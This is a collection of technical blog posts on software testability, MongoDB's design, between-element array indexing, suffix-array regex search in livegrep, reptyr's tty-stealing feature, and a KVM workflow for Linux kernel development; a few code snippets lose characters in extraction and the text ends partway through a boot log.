Made of Bugs

Design for Testability

When designing a new software project, one is often faced with a glut of choices about how to structure it. What should the core abstractions be? How should they interact with each other?

In this post, I want to argue for a design heuristic that I've found to be a useful guide to answering or influencing many of these questions:

Optimize your code for testability

Specifically, this means that when you write new code, as you design it and design its relationships with the rest of the system, ask yourself this question: "How will I test this code? How will I write automated tests that verify the correctness of this code, with minimal irrelevant assumptions about the environment or the rest of the system?" And if you don't have a good answer to that question, redesign your abstractions or interfaces until you do.

I've found this heuristic valuable in two different ways, and I'll discuss both here.

You get good tests

This one is, perhaps, obvious: If you set out with a goal of having good tests, you will likely end up with good tests.

However, I think it's worth saying a bit more about it.

First, I want to emphasize how wonderful it is to work in a code base with good tests. The process of verifying changes is simple: just run the tests. No need to set up complicated development environments and poke at the system manually or interactively; just make test, and get, if not a guarantee, high confidence that your code does what you think it does and hasn't broken anything important.

In large and mature software systems, the hardest part of making changes is not the change itself, but making the change in a way that doesn't regress any other important behavior. Good, fast, tests that can provide basic assurances quickly are therefore an enormous productivity improvement.

Second, in order to really realize the benefits of good tests, you need to be able to run tests – or, at a mininum, the subset of tests covering your changes – quickly, in order to keep a fast development cycle.

In order to preserve this property as a system scales, you need to have good unit tests. There are a lot of religious arguments out there about the boundaries between "unit", "functional", "integration", and other sorts of tests; By "unit" tests here I mean tests that exercise some specific module or component of the code base with minimal dependencies on or invocation of other code in the application.

You will always also need some number of integration tests, which exercise the application end-to-end, in order to shake out the inevitable subtle interactions betwen components. But relying primarily on unit tests brings significant advantages:

  • Unit tests are fast: By exercising a limited amount of code, they run more quickly than tests that must invoke the entire application.
  • More importantly, unit tests scale: In a codebase with mostly unit tests, test speed should scale linearly with application size. With more functional end-to-end tests, you risk scaling closer to quadratically, as each component requires tests that in turn incidentally exercise nearly every other component.
  • Because unit tests are associated with clear pieces of code, it's easy to run only the tests corresponding to a specific change, providing an even faster feedback loop to development.

Good unit tests don't happen by accident, however. It's very hard to have good unit tests without having good "units": Portions of code with narrow and well-defined interfaces, which can be tested at those interfaces.

The best way to have such logical units, which then permit excellent tests, which in turn permit rapid feedback cycles while maintaining a mature project, is just to do so directly: Write code with this end in mind.

You get better code

The second reason to write code with the tests in mind is that it actually ends up with better code!

Let's consider at some of the characteristics that easy-to-test code should have:

A preference for pure functions over immutable data

Pure functions over immutable data structures are delightfully easy to test: You can just create a table of (example input, expected output) pairs. They're generally also easy to fuzz with tools like QuickCheck, since the input is easy to describe.

Small modules with well-defined interfaces

If a chunk of code has a small, well-defined interface, we can write black-box tests in terms of that interface, which test the described interface contracts, without caring excessively about either the internals of the module, or about the rest of our system.

A separation of IO and computation

IO is, in general, harder to test than pure code. Testable systems therefore isolate it from the pure logic of the code, to allow them to be tested separately.

Explicit declaration of dependencies

Code that implicitly plucks a database name out of the global environment is much harder to test than code that accepts a handle as an argument – you can call the latter with different handles over the course of your test, to test against a clean database each time, to test in multiple threads at once, or whatever else you need.

In general, testable code accepts dependencies as explicit arguments at some point, instead of assuming their implicit availability.

If I look at these characteristics, I find that they're also the characteristics of good, well-structured code in general! By architecting a system with testing in mind, we generally get a better-factored system than we would have, otherwise.

Furthermore, by approaching these properties indirectly – through the lense of testing – we make them more concrete. It's easy to debate indefinitely what the right modules, interfaces and structures are for a software system; But faced with the concrete frame of "What makes it easy to adequately test this code?", it's easier to evaluate our choices and to decide when we've gone far enough.


There are few things more important for a complex software system than the ability to make changes with confidence, and high-quality automated tests are one of the most important tools we have to this end. Good tests don't happen by accident, or even by brute-force effort: they happen by design, because the application was written to enable them.

As you write software, always be asking yourself "How will I test this software's correctness?" and be willing to design to that goal. In return, you'll get a system you can be – and stay – much more confident of, and one that's better-structured otherwise.

What MongoDB Got Right

MongoDB is perhaps the most-widely-mocked piece of software out there right now.

While some of the mockery is out-of-date or rooted in misunderstandings, much of it is well-deserved, and it's difficult to disagree that much of MongoDB's engineering is incredibly simplistic, inefficient, and immature compared to more-established databases like PostgreSQL or MySQL.

You can argue, and I would largely agree, that this is actually part of MongoDB's brilliant marketing strategy, of sacrificing engineering quality in order to get to market faster and build a hype machine, with the idea that the engineering will follow later.

In this post, however, I want to focus on something different: I want to explore some design decisions that I believe MongoDB got right, especially compared to SQL databases, its main competitors1.

Implementations evolve and improve with time, but interfaces last nearly forever. In each of the cases I explore, I contend that MongoDB legitimately out-innovated SQL databases, potentially positioning it – in a few years, once the implementation matures – as a superior database for a wide range of use cases.

This post is not an exhaustive enumeration: In the interests of space, I've chosen a few areas to focus on, in which I think MongoDB has really hit on some good ideas. There are a lot of other differences between MongoDB and a SQL RDBMS; This post shouldn't be construed as either a defense of or a criticism of any individual feature or design choice not listed here.

Structured Operation Format

Let's start with the simplest one. Making the developer interface to the database a structured format instead of a textual query language was a clear win.

SQL is a great language for ad-hoc exploration of data or for building aggregates over data sets. It's an absolutely miserable language for programmatically accessing data.

Querying SQL data involves constructing strings, and then – if you want to avoid SQL injection – successfully lining up placeholders between your pile of strings and your programming language. If you want to insert data, you'll probably end up constructing the string (?,?,?,?,?,?,?,?) and counting arguments very carefully.

The situation is sufficiently untenable that it's rare to write apps without making use of an ORM or some similar library, creating additional cognitive overhead to using a SQL database, and creating painful impedance mismatches.

By using a structured (BSON) interface, MongoDB makes the experience of programmatically interacting with the database much simpler and less error-prone2. In a world where databases are more frequently used as backend implementation details owned by an application – and thus accessed entirely programmatically – this is a clear win.

BSON probably wasn't the best choice, and MongoDB's implementation isn't perfect. But it's a fundamentally better approach for how we use databases today than SQL is.

Replica Sets

Now we'll turn to the more operational side of MongoDB. MongoDB, out of the box, includes support for "replica sets", MongoDB's replication+failover solution. A MongoDB Replica Set consists of a "primary", which services all writes, and a group of "secondaries", which asynchronously replicate from the primary. In the event of a failure of the primary, a raft-like consensus algorithm automatically elects and promotes a new primary node.

Nearly anyone who uses SQL databases in production ends up configuring read replicas, in order to distribute read load, and provide a hot spare in the event of the loss of the primary. However, with both MySQL and PostgreSQL, configuring replication remains complex and error-prone, both in terms of the breadth of options available, and in the set-up and management of read replicas. I challenge anyone unfamiliar with the respective systems to read mysql or postgres's replication documentation and efficiently determine the correct setup for a simple read slave.

And automated failover is even more fraught in the SQL world; Github famously disabled their automated failover after their solution caused more outages than it resolved. Even once you have a failover solution – and everyone's looks slightly different – client libraries are often not built with failover in mind, requiring applications to manually detect failure and trigger reconnects.

MongoDB's replica sets are not without their warts, but the conceptual model is fundamentally strong, and allows operators to, with minimal fussing, configure read replicas, manually or automatically fail over to a new server, add or remove replicas, and monitor replication health, via simple, standard interfaces, all with minimal or no downtime, and almost entirely using in-band administrative commands (no editing of configuration files or command-line options).

Baking replication, membership, and failover into the core also means that drivers can be aware of it at a much higher level. The standard MongoDB client drivers are aware of replica set membership, and automatically discover the primary and reconnect as failovers happen and the primary moves around or nodes come and go. Awareness of secondaries also allows application developers to select desired consistency and durability guarantees ("read preference" and "write concern" in Mongo jargon) on a per-operation level.

In a world where we increasingly take for granted the devops mantra of "cattle, not pets", and where databases are often the quintessential "pet" (special, singleton, servers requiring lots of careful manual attention), the MongoDB replica set model moves us strongly towards a world where a database is a cluster of mostly-indistinguishable machines that can be individually swapped out at will, and the system will adapt appropriately.

The Oplog

MongoDB's oplog is the data structure behind MongoDB's replication. Similar in concept to MySQL's row-based replication, it logs every modification made to the database, at level of individual documents. By following this log and replaying the writes, secondaries in a replica set are able to efficiently follow the primary and stay up-to-date.

At a technical level, the oplog is not particularly novel or innovative. In terms of how it fits into the overall system, however, the design is compelling in a number of ways.

The oplog is exposed directly as a collection ( in MongoDB, and can be accessed just like any other collection. This design choice simplifies interacting with the oplog in a number of ways: the same APIs can be used in client bindings, the standard authentication and authorization mechanisms work, and the same data format (BSON objects) is used, making entries easy for users to interpret.

In addition, the oplog uses GTID-like position identifiers that are identical across all nodes in a replica set. This allows clients to seamlessly follow writes across the replica set as a logical unit, without thinking too hard about the physical topology or which nodes are primary.

Rather than define a new serialization format for changes, the oplog reuses BSON, like everything else in MongoDB. In addition, the structure of BSON entries is quite simple – there are only five or so types of operations. The conjunction of these two features makes it easy to parse and interpret oplog entries.

The combination of all these features means that it's feasible – even easy – to use the oplog not just as an internal implementation detail, but as an application-visible log of all database writes, which can be used to drive external systems, such as data analysis pipelines or backup systems.

My own MoSQL, for instance, replicates from MongoDB (via the oplog) into PostgreSQL, in under 1000 lines of Ruby. Meteor, a platform for realtime javascript applications, leverages the oplog to get realtime notification of changes to the database without having to poll for changes.


This post is not a holistic defense of MongoDB as it exists today. MongoDB remains immature, and today's SQL databases remain some of the most mature, battle-tested, reliable, and performant storage solutions ever created. And MongoDB made many novel design decisions other than the ones I've cited above; some are good ideas, some are bad ideas, and some remain to be determined.

However, I do believe that, in significant ways, MongoDB is much better designed for the ways we write and run applications in 2015 than the SQL RDBMS paradigm.

Put that way, of course, this realization shouldn't be surprising: SQL databases – while incredible pieces of technology – haven't really fundamentally changed in decades. We should probably expect a database designed and written today to be a better fit for modern application and operational paradigms, in at least some ways.

The interesting question, then, is whether the rest of the engineering behind MongoDB can catch up. I, for one, am optimistic. MongoDB continues to improve rapidly: It's adapted a real storage engine, and Facebook is working on another. MongoDB 3.2, now in RC, significantly improves leader elections. Every day, more experienced engineers turn their eyes on MongoDB, and while they often do discover problems, those problems then tend to get fixed fairly efficiently.

So while MongoDB today may not be a great database, I think there's a good chance that the MongoDB of 5 or 10 years from now truly will be.

  1. Despite all the "NoSQL" hype, MongoDB is structurally and functionally much more similar to a SQL database than it is to most of the more exotic NoSQL databases. In both MongoDB and SQL RDBMSes, the core abstraction is a single server, with a number of tables or collections that support multiple consistent secondary indexes and rich querying. 

  2. MongoDB did mess up slightly and allow a literal/operator ambiguity that permits a form of injection attack, but it's more limited and rarer than SQL injection. 

Indices Point Between Elements

If you're familiar with nearly any mainstream programming language, and I asked you to draw a diagram of an array, the array indices, and the array elements, odds are good you'd produce a diagram something like this:

In this post, I want to persuade you to replace that image, or, at least, to augment it with an alternate view on the world.

I want to argue that, rather than numbering elements of an array, it makes just as much sense, and in many cases more, to number the spaces between elements:

With this representation, we do have to relearn how to refer to indexing: We refer to A[i] no longer as "The element at index i", but rather "The element to the right of index i".

Representing Ranges

I'll run through a few reasons why I prefer this representation, but most of them boil down to representing ranges of elements.

Suppose we have an array, and we want a way to refer to a certain subset of it, like so:

One obvious answer is with a start and a length: start=2 length=3, but it's often convenient to represent a range as a pair of (start, end) indices. The latter representation, for example, lets you check if an index falls into the range directly.

If we number elements, it's not immediately apparent which index to use for end:

Both (1, 3) and (1, 4) seem initially defensible. But if we number between elements, there's a clear, unique answer:

The indices we want are the ones that lie between the included and excluded elements: (1, 4).

With this model, the rules of range manipulation and comparison become straightforward:

  • Two ranges are adjacent if left.end == right.start

  • One range is a subset of another if inner.start >= outer.start && inner.end <= outer.end

  • A range contains end - start elements:

In order to answer the question "if I dereference an index, is the result contained in the range?", we need to remember that A[i] is now defined as the element after index i. With that in mind, it becomes easy to see that for a range (start, end), elements indexed by start <= i < end are within the range.

Off-by-one errors

Indexing between elements, instead of indexing elements, helps avoid a large class of off-by-one errors. I'll run through a number of examples using Python, but the fundamental issues apply to array APIs in many more languages, or to any time you're manipulating an array-like data structure via any of these operations.

Inserting elements

If you want to insert an element into an array, how do you specify the location? If you name an existing element, does the new element go before or after that element?

Python's standard library documentation somewhat awkwardly specifies that "The first argument is the index of the element before which to insert," clarifying that this means insert(0, X) inserts X at the start of the array.

But if we number gaps between elements, instead of numbering elements, the story is perfectly clear: 0 names the gap before the first element, and so of course inserting at 0 should prepend an element. Similarly, 1 names the gap between the first and second element, and all the way on.

Slicing arrays

How do we refer to a partial subset of an array that we want to extract? Python, like many other languages, lets you use a pair of indexes:

>>> [1,2,3,4][1:3]
[2, 3]

The documentation, however, has to resolve the same ambiguity noted above: Is the final index excluded or included? Ruby even helpfully offers you both choices:

irb(main)> [1,2,3,4][1...3]
=> [2, 3]
irb(main)> [1,2,3,4][1..3]
=> [2, 3, 4]

As discussed earlier, if we adjust our view of indexes, there is no ambiguity at all. Conveniently, this also gives us the same semantics as Python and most other languages: there are good reasons half-inclusive ranges are generally preferable, and most languages converge on this choice.

Removing elements

If we want to remove a single element from an array, it does seem simpler to index elements directly – we can just name directly the index which we want to eliminate.

However, if we want to adopt the more general primitive, of removing slices, (Python's del array[x:y]), we run into the same problem as extracting slices, previously. Once again, shifting our thinking to index between elements removes all ambiguity.

Incrementally consuming an array

Suppose we're walking through an array, consuming it by elements or groups of elements at a time. Perhaps we're parsing a string, consuming tokens as we go.

How do we keep track of our current position? Should we keep the index of the last element we've processed, or of the first element we have yet to process?

If we shift our perspective, this problem too vanishes: We can store the index between the last item consumed, and the next one to be consumed. Our index neatly partitions the buffer into "processed" and "to-be-processed", with no ambiguity at all.

C/C++ Pointers and Iterators

With pointers in C, or with iterators in C++ (which were essentially designed to mimic C's pointer semantics), we speak of pointers into an array or of iterators as referring to a specific element in memory.

However, both systems allow for this additional "valid" iterator or pointer, which points "just past the end" of a container. This pointer/iterator does not name a valid element, but is a valid pointer or iterator. The C specification is full of awkward verbiage to address this special-case:

both [pointers] shall point to elements of the same array object, or one past the last element of the array object;

(N1256 §6.5.6p9). And with a C++ std::vector, v.begin() and v.end() are both valid iterators, but v.end() points "one past the end" and cannot be dereferenced.

These apparent odd inconsistencies and special cases vanish if you shift your thinking slightly in just the way I've been arguing: Instead of thinking of iterators as referring to individual elements, we hold that they name the interstitial points between elements.

If we do so, the "one-past-the-end" iterator is no longer "past" the end – it points directly at the end, which is no more fundamentally special than the "start" iterator which points directly at the beginning.

It's still the case that we cannot dereference v.end(), but that behavior is a function of the "dereference" operation, which selects the element after an iterator. The iterators themselves are no longer special cases.

Postscript: 0 or 1?

It used to be popular, and still is in some circles, to debate whether programming languages ought start array indexing at 0 or 1. And there are still a few holdouts, like Matlab, which number their arrays starting from 1, causing no end of pain and confusion to those poor souls who have to switch between them and more mainstream languages.

Once I started thinking of pointers or iterators or indexes as indexing between elements, one of the more mind-bending realizations that followed was that this model can harmonize the "index from 0" and "index from 1" camps!

Let's consider an array with interstices labeled again:

The first element, A[0] in C or Python, is bracketed by indexes 0 and 1. The decision, then to name it as 1, does not involve changing the picture at all; If you draw indices between elements, the statement "Arrays start at 1" is simply a decision that "The deference operator refers to the element to the left of an index," in exactly the same way that I described dereference in a 0-indexed language as taking the element to the right. And presented that way – "should dereference take the left or the right element?" – it becomes clear that 0 or 1 really is an arbitrary choice.


I credit my personal shift in thinking – from labeling elements to labeling interstices – to my reading of the excellent The Craft Of Text Editing, which introduces the concept both for its notion of a mark, and specifically as an implementation idea while talking about buffer representations.

I recommend giving the book a read even if you never aspire personally to implement an Emacs; It's filled with a great number of interesting ideas, and possessed of a profound clarity of thought throughout.

Regular Expression Search With Suffix Arrays

Back in January of 2012, Russ Cox posted an excellent blog post detailing how Google Code Search had worked, using a trigram index.

By that point, I'd already implemented early versions of my own livegrep source-code search engine, using a different indexing approach that I developed independently, with input from a few friends. This post is my long-overdue writeup of how it works.

Suffix Arrays

A suffix array is a data structure used for full-text search and other applications, primarily these days in the field of bioinformatics.

A suffix array is pretty simple, conceptually: It's a sorted array of all of the suffixes of a string. So, given the string "hither and thither", we could construct a suffix array like so:

hither and thither
Index Suffix
6  and thither
10  thither
7 and thither
9 d thither
16 er
4 er and thither
15 her
3 her and thither
12 hither
0 hither and thither
13 ither
1 ither and thither
8 nd thither
17 r
5 r and thither
14 ther
2 ther and thither
11 thither

Note that there is no need for each element of the array to store the entire suffix: We can just store the indexes (the left-hand column), along with the original string, and look up the suffixes as needed. So the above array would be stored just as

[6 10 7 9 16 4 15 3 12 0 13 1 8 17 5 14 2 11]

There exist algorithms to efficiently construct suffix arrays (O(n) time), and in-place (constant additional memory outside of the array itself).

Full-text substring search

Once we have a suffix array, one basic application is full-text search.

If we're trying to find a substring within a larger corpus, we know that that substring, if present, must be a prefix of some suffix of the larger corpus. That is, given a suffix array, any substring present in the corpus must be the start of some entry in the suffix array. For example, searching for "her" in "hither and thither", we find that it is present in two places in the string, and it begins two lines of the above suffix array:

15 her
3 her and thither

But because the suffix array is sorted, we can find those entries efficiently by binary searching in the suffix array. The indexes then give us the location of the search string in the larger text.

Towards Regular Expression Search

We begin with a large corpus of source code we want to do regular expression search over.

During indexing, livegrep reads all of the source and flattens them together into a single enormous buffer (livegrep uses the open-source libdivsufsort library to build the suffix array; old versions of livegrep used a hand-rolled radix sort, which often went quadratic – divsufsort dramatically improved index-building performance). As it does this, it maintains information I call the "file content map", which is essentially just a sorted table of (start index, end index, file information), which allows us to determine which input file provided which bytes of the buffer.

(This is something of a simplification; livegrep actually uses a number of suffix arrays, instead of a single giant one, and we compress the input by deduplicating identical lines, which makes the file content map more complicated. A future blog post may discuss the specifics in more detail)

But now how do we use that structure to efficiently match regular expressions?

As a first idea, we can find literal substrings of the regular expression, find any occurrences of those strings using the suffix array, and then only search those locations in the corpus.

For example, given /hello.*world/, we can easily see that any matches must contain the string "hello", and so we could look up "hello", find all lines containing it, and then check each line against the full regular expression.

More complex searching

But it turns out we can do better. Because of the structure of the suffix array, we can perform at least two basic queries beyond substring search:

  • Range search: We can efficiently find all instances of a character range, by binary-searching each end. If we have the range [A-F], we binary-search for the first suffix starting with A, and the last suffix starting with F, and we know that every index in between (in the suffix array) starts with something between A and F.

  • Chained searches: If we have a chunk of the suffix array that we know has a common prefix, we can narrow down the search by doing additional searches and looking at the next character, within that range. For example, if we want to find /hi(s|m)/, we can binary-search to find all positions starting with hi, which gives us a contiguous block of the suffix array. But since that block is sorted, we can do another pair of binary searches within that range, looking only at the third character, one looking for s and one for m, which will give us two smaller chunks, once for "his" and one for "him".

We also have the option of making multiple searches and combining the results; Given /hello|world/, we can search for "hello", and search for "world", and then look at both locations.

And we can combine all of these strategies. By way of example, we can search for /[a-f][0-9]/ by:

  1. Binary searching to find a-f
  2. Splitting that into 6 ranges, one for a, b, c, d, e, and f
  3. For each of those ranges, doing a binary search over the second character, looking for the 0-9 range.

When we're done, each of the resulting ranges in the suffix array then contains only locations matching /[A-F][0-9]/.

Essentially, this means we can answer queries using index lookup keys of the form (borrowing Go syntax):

type IndexKey struct {
  edges []struct {
    min  byte
    max  byte
    next *IndexKey

(livegrep's definition is similar at the core, with some additional bookkeeping that's used while analyzing the regex)

For each edge in a query, we do a search to find all suffixes starting in that range, then split that range into individual characters, and recurse, evaluating next and looking one character deeper into the suffix.

Given a regular expression, livegrep analyzes it to extract an IndexKey that should have the property that any matches of the regular expression must be matched by that IndexKey, and that is as selective as possible.

For many cases, this is simple — a character class gets translated directly into a series of ranges, a literal string is a linear chain of IndexKeys with one-character ranges, and so on. For repetition operators and alternations (|), things get more complicated. I hope to write more about this in a future blog post, but for now you can read if you're curious, or play with analyze-re, which has a dot output mode showing the results of livegrep's analysis.

Using the Results

Walking the suffix array as above produces a (potentially large) number of positions in the input corpus, which we want to search. Rather than searching each individually, livegrep takes all of the matches and sorts them in memory. We then walk the list in order, and if several matches are close together, run a single regex match over the entire range at once.

Livegrep uses Russ Cox's own RE2 library to match regular expressions. In addition to being quite fast, RE2, unlike PCRE or most other regex libraries, actually compiles regexes into finite-state automata, providing guaranteed-linear matching performance.

Grouping matches together lets us take advantage of RE2's speed to churn through big chunks of text at once, instead of micromanaging the calls and doing excessive bookkeeping ourselves.

In order to decide exactly how far to search around a potential match, we use the fact that livegrep searches on lines of source code: We can use a simple memchr to find the preceding and following newline, and just search precisely the line of code containing the possible match.

Once we've run RE2 over all of the match positions, we have a list of matches in the corpus. For each match, use use the file content table mentioned earlier to identify the file that contained those bytes, and return the the match. In order to identify line number, we just pull the entire file contents out, and count newlines directly.

If, however, we've also been given a file reference to constrain the search (e.g. file:foo\.c), we walk the file-contents map in parallel with the list of results from the index walk, and discard positions outright unless the file containing them matches the file regular expression.

The interesting feature of this approach is that applying a filename restriction doesn't actually limit the search space that much — livegrep still walks the entire suffix array, and still considers each resulting match (although it can do a faster check against the content map, instead of calling into RE2). However, livegrep is fast enough that it doesn't need to take advantage of this restriction to return results quickly — and in fact it needs to be, in order to handle queries with no file restriction.

This does mean that some of the slowest queries you can make against livegrep are ones that limit the path heavily, but don't provide good usage of the suffix array: . file:zzzz is close to the slowest query you can make against livegrep today.


That's the basic picture. Next time, I'll discuss in more detail how we construct index queries and transform regular expressions into an index query, and then finally I'll talk about how the suffix array and file-contents data structures actually work in livegrep, versus the simplified version presented here. Notably, livegrep actually compresses the input significantly, which reduces the memory needed and speeds up the searches, at the cost of additional complexity building the index and interpreting results.

New Reptyr Feature: TTY-stealing

Ever since I wrote reptyr, I've been frustrated by a number of issues in reptyr that I fundamentally didn't know how to solve within the reptyr model. Most annoyingly, reptyr fundamentally only worked on single processes, and could not attach processes with children, making it useless in a large class of real-world situations.

TTY stealing

Recently, I merged an experimental reptyr feature that I call "tty-stealing", which has the potential to fix all of these issues (with some other disadvantages, which I'll discuss later).

To try it out, clone and build reptyr from git master, and attach a process using reptyr -T PID.

Unlike in the default mode, reptyr -T will attach the entire terminal session of PID, not just the single process. For instance, if you attach a less process and then hit q, you'll find yourself sitting at the same shell that launched less, not the shell you launched reptyr from. Exit that shell, and you'll be back at your original session.

One unfortunate known issue: reptyr -T cannot attach sessions that were started directly from an ssh session unless it is run as root. Read on to learn why.

How it works

In its default mode of operation, reptyr attaches (via ptrace(2)) directly to the target process, and actually swaps out the terminal file descriptors to point at a new terminal. This mode of operation explains (mostly) why we can't attach process trees: We would need to attach to every process individually, and coordinate the switchover (there are actually even deeper reasons related to the tty handling, but that's the basic story).

reptyr -T tackles the problem from the other end. When you're running a terminal session on a modern machine, the terminal device that your shell and commands run on is a "pseudo-terminal", a virtual terminal device that acts essentially like a two-way pipe, with a bunch of extra input-handling behavior. When your bash writes to stdout, that data flows over the pty, and is read by the terminal emulator (which might be gnome-terminal, or might be tmux, or might be ssh), which then displays it to you in some way.

Instead of switching out terminals in the target process, reptyr -T goes after the other end of the pty, the so-called "master". reptyr -T attempts to discover the pid of the terminal emulator, attaches to it via ptrace(2), and finds the fd corresponding to the master end of the target pty. It then opens a UNIX socket, and uses SCM_RIGHTS to send the file descriptor back to the reptyr process. reptyr closes the master fd in the original terminal emulator (opening /dev/null over it, to minimize disruption), and detaches from the master.

reptyr then takes over the role of terminal emulator, reading from the the master fd and copying output to its own terminal, and copying input from its terminal back to the master fd. This has the net effect that you appear to be connected directly to the target session.

Because this process does not touch the terminal session at all, it is entirely transparent to the process(es) being attached, which and works in a large number of circumstances where vanilla reptyr would glitch.


Unfortunately, the new mode isn't quite flawless. ptraceing the terminal emulator instead of the target process brings a few new problems.

The most notable one is that you need to be able to attach to the emulator process at all. In the case of an ssh session, that means the forked sshd child for your connection. sshd drops privileges to match the authenticated user (via setuid(2) and friends), so the emulator process does match the user ID of your user account. However, Linux forbids users from ptrace()ing a process that has undergone a UID transition via setuid, and so we can't attach to that process to steal the master end of the pty.

(The reasoning for this restriction confused me at first, but is perfectly sound: Even though sshd has dropped privileges, it might still contain sensitive information in its heap, such as the machine's ssh private keys. We can't be confident it's truly unprivileged (and thus safe to sketch on) until it's called execve and cleared out all interesting state).

Try it out!

I've tested out reptyr -T a fair bit, but it hasn't gotten broad testing or usage yet. I'd love your reports of what it does or doesn't work on, for you! Try it, and drop me an email or open an issue!

Lightweight Linux Kernel Development With KVM

I don't do a ton of Linux kernel development these days, but I've done a fair bit in the past, and picked up a number of useful techniques for doing kernel development in a relatively painless fashion. This blog post is a writeup of the tools and techniques I use when developing for the Linux kernel. Nothing I write here is "the one way" to do it, but this is a workflow I've found to work for me, that I hope others may find useful. I'd love to hear if anyone has incremental improvements or alternate strategies.


The instructions as-listed assume you're developing an x86_64 kernel, from an x86_64 host (kernel and userspace). I will attempt to mention and explain the tweaks necessary for 32-bit kernels and/or hosts where appropriate, out-of-line. Even if you're running a 32-bit userspace, if you have a 64-bit kernel on the host, it's perfectly possible to develop on a 64-bit guest, following these instructions.

I'm assuming a Debian or Ubuntu host for development. If you're not on one of those platforms, the kvm command-lines should still work, but you may need something other than debootstrap to build your images.

Kernel config

For kernel development, unless I have a specific reason to do otherwise, I use an extremely lightweight .config – no modules (everything is built-in), and minimal driver support – in particular, I use virtio drivers for everything, and disable all other driver support. The advantage of no-modules is that it is extremely easy to boot a VM (no fussing around with an initrd), and a minimal config dramatically reduces build times.

I started with an allnoconfig, and manually enabled the features I need. I recommend you just start with my .config file (for kernel 3.12), but I'll include a detailed list at the end of this post explaining which things I enabled, if you want to construct your own.

(For 32-bit: Just disable CONFIG_64BIT ("64-bit kernel"))

Building a disk image

I use debootstrap to build a minimal Debian userspace, and then transplant that onto a disk image and boot off of that. Here's an annotated sequence of command lines:

# Build a Wheezy chroot. Install an sshd, since it will be handy
# later.
mkdir wheezy
sudo debootstrap wheezy wheezy --include=openssh-server

# Perform some manual cleanup on the resulting chroot:

# Make root passwordless for convenience.
sudo sed -i '/^root/ { s/:x:/::/ }' wheezy/etc/passwd
# Add a getty on the virtio console
echo 'V0:23:respawn:/sbin/getty 115200 hvc0' | sudo tee -a wheezy/etc/inittab
# Automatically bring up eth0 using DHCP
printf '\nauto eth0\niface eth0 inet dhcp\n' | sudo tee -a wheezy/etc/network/interfaces
# Set up my ssh pubkey for root in the VM
sudo mkdir wheezy/root/.ssh/
cat ~/.ssh/id_? | sudo tee wheezy/root/.ssh/authorized_keys

# Build a disk image
dd if=/dev/zero of=wheezy.img bs=1M seek=4095 count=1
mkfs.ext4 -F wheezy.img
sudo mkdir -p /mnt/wheezy
sudo mount -o loop wheezy.img /mnt/wheezy
sudo cp -a wheezy/. /mnt/wheezy/.
sudo umount /mnt/wheezy

# At this point, you can delete the "wheezy" directory. I usually
# keep it around in case I've messed up the VM image and want to
# recreate it.

(For different architectures: You can pass --arch={i386,amd64} to debootstrap to control the architecture of the bootstrapped chroot)

Booting to userspace

At this point, you can boot to a working userspace by using a simple kvm invocation, giving it your disk image (specifying it should be exposed as a virtio device) and your kernel, and telling the kernel to boot from the virtual disk:

kvm -kernel arch/x86/boot/bzImage \
  -drive file=$HOME/vms/wheezy.img,if=virtio \
  -append root=/dev/vda

(For 32-bit: Use qemu-system-i386 to emulate a 32-bit VM, instead)

Configuring networking

The easiest way to get working networking in your VM is to use the KVM user-mode networking driver, which makes KVM set up a virtual LAN and NAT your VM to the outside world. To get ssh access, you can tell KVM to set up a port-forward. Just add these arguments to your command-line:

kvm [...]
  -net nic,model=virtio,macaddr=52:54:00:12:34:56 \
  -net user,hostfwd=tcp:

The MAC address I've chosen is the default address historically assigned by KVM. It doesn't overly matter what you specify, but you want to be consistent, since if the MAC address changes, Debian will renumber the ethernet device (to eth1, eth2, etc.), potentially screwing up your networking config.

The hostfwd=tcp: fragment forwards port 4444 on localhost on the host to the VM on port 22, so you can ssh to your VM on localhost:4444.

If you've followed the setup above (installing openssh-server, configuring /etc/network/interfaces, and adding your pubkey to the image), ssh should Just Work once the VM boots.

Headless operation

By default, KVM will pop up a graphical console for your VM. This is probably more annoying than useful. To get headless operation, add this to your command-line:

kvm [...]
  -append 'root=/dev/vda console=hvc0' \
  -chardev stdio,id=stdio,mux=on,signal=off \
  -device virtio-serial-pci \
  -device virtconsole,chardev=stdio \
  -mon chardev=stdio \
  -display none

Note that the -append here should replace any other -append lines you have; If you've added any extra kernel options of your own, you'll need to merge them all into one -append line.

This will multiplex the KVM console and a virtual console for the VM onto stdout. Type Ctrl-A h to get a help message about switching between them. If everything works right, the kernel console output will appear in your shell, and a getty will run there once you've finished booting.

Note that you may need to wait a few seconds before any output shows up, while the kernel boots itself far enough to connect to the virtual console and redirect output.

(For some reason, using a virtconsole like this is not completely reliable for me – every few boots, the console will just fail to come up, somehow. Let me know if you figure it out…)

Sharing a filesystem tree with the VM

scping file back and forth with your VM image isn't too bad, but it's even easier to directly share a filesystem tree with the VM. To do this, I use a virtio 9P mount. Say I want to share ~/code/linux with the VM. I'd add this to my command-line:

kvm [...]
  -fsdev local,id=fs1,path=$HOME/code/linux,security_model=none \
  -device virtio-9p-pci,fsdev=fs1,mount_tag=host-code

Then, from within the VM, I could run

 mkdir -p /mnt/host
 mount host-code -t 9p /mnt/host

And I'd be sharing the directory back and forth!

A few notes:

  • security_model=none causes the VM to map permissions between the host and the guest as best it can using the qemu process's uid, and ignore errors if it can't (e.g. permission bits will be passed through on files you own, but chowning the file inside the VM will have no effect)

  • If you'd rather, you can use security_model=passthrough, and run qemu as root, to directly map permissions between the host and guest.

  • You can add ,readonly on the -fsdev argument to pass the directory through read-only – the VM will be blocked from writing to it.

Building initrds

Booting to a complete userspace inside the VM is great, and super-convenient for exploration and experimentation, but also comparatively slow. One alternative, which is somewhat limited but super lightweight and flexible, is to build test programs into an initrd, and boot directly into that.

To build an initrd from a directory, you can just run:

( cd my-dir && find . | cpio -o -H newc ) | gzip > initrd.gz

In the most lightweight version, you'll want to build a static binary (gcc -static should suffice), and store it as /init in your initrd. For example:

$ cat hello.c
#include <stdio.h>
#include <unistd.h>
#include <sys/reboot.h>

int main(void) {
    printf("Hello, world!\n");
    return 0;
$ mkdir initrd
$ gcc -o initrd/init -static hello.c
$ ( cd initrd/ && find . | cpio -o -H newc ) | gzip > initrd.gz
1751 blocks
$ kvm -kernel arch/x86/boot/bzImage \
    -initrd initrd.gz \
    -append 'console=hvc0' \
    -chardev stdio,id=stdio,mux=on \
    -device virtio-serial-pci \
    -device virtconsole,chardev=stdio \
    -mon chardev=stdio \
    -display none
input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
Freeing unused kernel memory: 676K (ffffffff81646000 - ffffffff816ef000)
Write protecting the kernel read-only data: 6144k
Freeing unused kernel memory: 1156K (ffff8800012df000 - ffff880001400000)
